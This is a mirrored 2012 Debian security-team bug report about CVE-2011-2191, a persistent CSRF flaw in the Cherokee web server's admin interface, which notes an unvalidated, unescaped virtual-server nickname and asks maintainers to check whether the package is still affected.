thr3ads.net - Secure testing team - [Secure-testing-team] Bug#661993: CVE-2011-2191: persistent CSRF on admin interface [Mar 2012]

If this information is useful, please help other people find it:
Share via:

Twitter
Facebook
Email

Helmut Grohne

2012-Mar-03 10:46 UTC

[Secure-testing-team] Bug#661993: CVE-2011-2191: persistent CSRF on admin interface

Source: cherokee
Version: 1.2.101-1
Severity: serious
Tags: security

References:
CVE-2011-2191
https://bugs.launchpad.net/ubuntu/+source/cherokee/+bug/784632
https://bugzilla.redhat.com/show_bug.cgi?id=713304

Please verify whether the issue is still present in the package. A quick
look at admin/PageVServers.py suggests that this is the case, because
the Commit function stores new_nick without any validation. Even though
the value is escaped on some accesses admin/PageStatus.py Render_Content
does not perform escaping.

Helmut

Secure testing team - Mar 2012 - Bug#661993: CVE-2011-2191: persistent CSRF on admin interface

[Secure-testing-team] Bug#661993: CVE-2011-2191: persistent CSRF on admin interface